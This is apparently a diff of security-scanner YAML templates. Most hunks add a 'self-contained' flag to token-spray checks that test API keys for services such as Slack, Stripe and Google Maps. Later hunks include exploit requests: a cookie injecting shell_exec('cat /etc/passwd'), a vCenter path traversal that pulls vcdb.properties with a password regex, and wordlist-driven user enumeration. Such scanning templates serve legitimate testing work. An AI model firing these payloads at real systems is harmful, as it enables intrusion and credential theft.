- type: status
|
||||||
|
negative: true
|
||||||
status:
|
status:
|
||||||
- 404
|
- 404
|
||||||
negative: true
|
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps,embed
|
tags: token-spray,google,maps,embed
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps,embed
|
tags: token-spray,google,maps,embed
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search,nearby
|
tags: token-spray,google,search,nearby
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,roads
|
tags: token-spray,google,roads
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,place,details
|
tags: token-spray,google,place,details
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,places,photo
|
tags: token-spray,google,places,photo
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,playable,locations
|
tags: token-spray,google,playable,locations
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,route
|
tags: token-spray,google,route
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,speed,limit
|
tags: token-spray,google,speed,limit
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,maps
|
tags: token-spray,google,maps
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,streetview
|
tags: token-spray,google,streetview
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,timezone
|
tags: token-spray,google,timezone
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,6 +6,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,google,search,places,text
|
tags: token-spray,google,search,places,text
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
@ -14,6 +15,6 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
|
negative: true
|
||||||
words:
|
words:
|
||||||
- 'error_message'
|
- 'error_message'
|
||||||
negative: true
|
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,heroku
|
tags: token-spray,heroku
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
@ -17,9 +18,9 @@ requests:
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
condition: or
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- 201
|
- 201
|
||||||
- 202
|
- 202
|
||||||
- 206
|
- 206
|
||||||
condition: or
|
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,hubspot
|
tags: token-spray,hubspot
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,instagram,graph
|
tags: token-spray,instagram,graph
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,ipstack
|
tags: token-spray,ipstack
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,iterable
|
tags: token-spray,iterable
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,jumpcloud
|
tags: token-spray,jumpcloud
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,lokalise
|
tags: token-spray,lokalise
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,loqate
|
tags: token-spray,loqate
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mailchimp
|
tags: token-spray,mailchimp
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
|
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mailgun
|
tags: token-spray,mailgun
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,mapbox
|
tags: token-spray,mapbox
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,newrelic,nerdgraph
|
tags: token-spray,newrelic,nerdgraph
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,node,npm,package,manager
|
tags: token-spray,node,npm,package,manager
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,weather,openweather
|
tags: token-spray,weather,openweather
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pagerduty
|
tags: token-spray,pagerduty
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pendo
|
tags: token-spray,pendo
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,pivotaltracker
|
tags: token-spray,pivotaltracker
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,postmark
|
tags: token-spray,postmark
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,sendgrid
|
tags: token-spray,sendgrid
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
network:
|
network:
|
||||||
- inputs:
|
- inputs:
|
||||||
- data: "ehlo\r\n"
|
- data: "ehlo\r\n"
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,slack
|
tags: token-spray,slack
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,sonarcloud
|
tags: token-spray,sonarcloud
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,spotify
|
tags: token-spray,spotify
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,square
|
tags: token-spray,square
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,stripe
|
tags: token-spray,stripe
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,tinypng
|
tags: token-spray,tinypng
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,travis
|
tags: token-spray,travis
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,twitter
|
tags: token-spray,twitter
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,visualstudio,microsoft
|
tags: token-spray,visualstudio,microsoft
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,wakatime
|
tags: token-spray,wakatime
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,6 +7,7 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,weglot
|
tags: token-spray,weglot
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -7,17 +7,19 @@ info:
|
||||||
severity: info
|
severity: info
|
||||||
tags: token-spray,youtube
|
tags: token-spray,youtube
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
||||||
matchers-condition: or
|
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- 'quotaExceeded'
|
- 'quotaExceeded'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -16,10 +16,9 @@ requests:
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
user: helpers/wordlists/user-list.txt
|
user: helpers/wordlists/user-list.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -15,10 +15,9 @@ requests:
|
||||||
Accept: application/json, text/plain, */*
|
Accept: application/json, text/plain, */*
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
|
threads: 50
|
||||||
payloads:
|
payloads:
|
||||||
uid: helpers/wordlists/numbers.txt
|
uid: helpers/wordlists/numbers.txt
|
||||||
attack: sniper
|
|
||||||
threads: 50
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -12,6 +12,8 @@ requests:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
headers:
|
headers:
|
||||||
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
|
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
|
||||||
|
|
||||||
|
skip-variables-check: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -33,7 +33,7 @@ requests:
|
||||||
--01b28e152ee044338224bf647275f8eb
|
--01b28e152ee044338224bf647275f8eb
|
||||||
Content-Disposition: form-data; name="email"
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
test@{{randstr.tld}}
|
test@{{randstr}}.tld
|
||||||
--01b28e152ee044338224bf647275f8eb
|
--01b28e152ee044338224bf647275f8eb
|
||||||
Content-Disposition: form-data; name="editid"
|
Content-Disposition: form-data; name="editid"
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
|
GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
|
@ -20,14 +20,13 @@ requests:
|
||||||
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
|
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
|
||||||
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
|
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
|
||||||
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
|
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
|
||||||
attack: sniper
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
|
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
|
||||||
part: body
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue